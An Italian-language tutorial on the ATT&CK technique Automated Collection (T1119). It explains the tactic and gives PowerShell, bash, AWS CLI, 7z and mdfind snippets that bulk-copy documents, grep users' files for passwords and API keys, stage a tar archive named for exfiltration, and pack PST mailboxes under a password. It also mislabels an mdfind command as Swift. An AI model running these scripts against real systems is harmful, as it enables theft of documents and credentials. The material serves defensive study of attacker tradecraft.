Raccolta Automatica: Automated Collection (T1119)
La raccolta automatica rappresenta una tecnica sofisticata attraverso cui gli attaccanti sistematizzano il processo di acquisizione dati all'interno di una rete compromessa. Questa metodologia si manifesta nella fase TA0009 - Collection della kill chain, quando l'avversario ha già stabilito una presenza persistente e cerca di massimizzare l'efficienza nel sottrarre informazioni di valore.
Gli attori malevoli implementano script personalizzati, sfruttano interpreti di comandi nativi o utilizzano tool di accesso remoto per scandire automaticamente il sistema alla ricerca di file che corrispondono a criteri specifici. Negli ambienti cloud, la tecnica evolve ulteriormente attraverso l'uso di API native, pipeline di dati e servizi ETL per orchestrare operazioni di raccolta su larga scala.
L'impatto di questa tecnica è considerevole: 20 gruppi APT documentati la utilizzano attivamente, supportati da 44 strumenti software specializzati e osservata in 5 campagne di alto profilo. La sua pericolosità deriva dalla capacità di operare silenziosamente in background, raccogliendo metodicamente documenti sensibili, credenziali e proprietà intellettuale mentre l'attaccante mantiene un profilo operativo minimo.
Per comprendere appieno le capacità di questa tecnica, iniziamo con uno script PowerShell che automatizza la ricerca e raccolta di documenti Office:
Get-ChildItem -Path C:\ -Include *.docx,*.xlsx,*.pdf -Recurse -ErrorAction SilentlyContinue |
Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-30)} |
Copy-Item -Destination C:\temp\collection
Su sistemi Linux, un approccio simile utilizza find combinato con archivi compressi:
find /home -type f \( -name "*.pdf" -o -name "*.docx" -o -name "*.xlsx" \) -mtime -30 -exec cp {} /tmp/staging/ \;
tar czf /tmp/exfil_$(date +%Y%m%d).tar.gz /tmp/staging/
Per simulare la tecnica del gruppo Ke3chang, che esegue collezioni schedulate, possiamo implementare un job cron che opera durante orari di bassa attività. Il seguente script bash cerca file contenenti parole chiave sensibili:
#!/bin/bash
keywords=("password" "confidential" "secret" "api_key")
for keyword in "${keywords[@]}"; do
grep -r -l "$keyword" /home/*/Documents/ 2>/dev/null >> /tmp/interesting_files.txt
done
Negli ambienti cloud, la raccolta automatica sfrutta le API native. Con AWS CLI, possiamo enumerare e scaricare oggetti S3:
aws s3 ls s3://target-bucket --recursive | awk '{print $4}' |
while read file; do aws s3 cp "s3://target-bucket/$file" ./collection/; done
Il gruppo APT28 ha dimostrato l'uso di tool pubblici per compressione automatica. Simuliamo questa tecnica con 7zip su Windows:
for /f "delims=" %%i in ('dir /s /b C:\Users\*.pst') do 7z a -pinfected archive.7z "%%i"
Per macOS, Gamaredon Group utilizza script che scandiscono automaticamente documenti interessanti. Replichiamo con Swift:
mdfind -onlyin ~ 'kMDItemKind == "Microsoft Word Document" && kMDItemContentModificationDate >= $time.now(-2419200)'
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo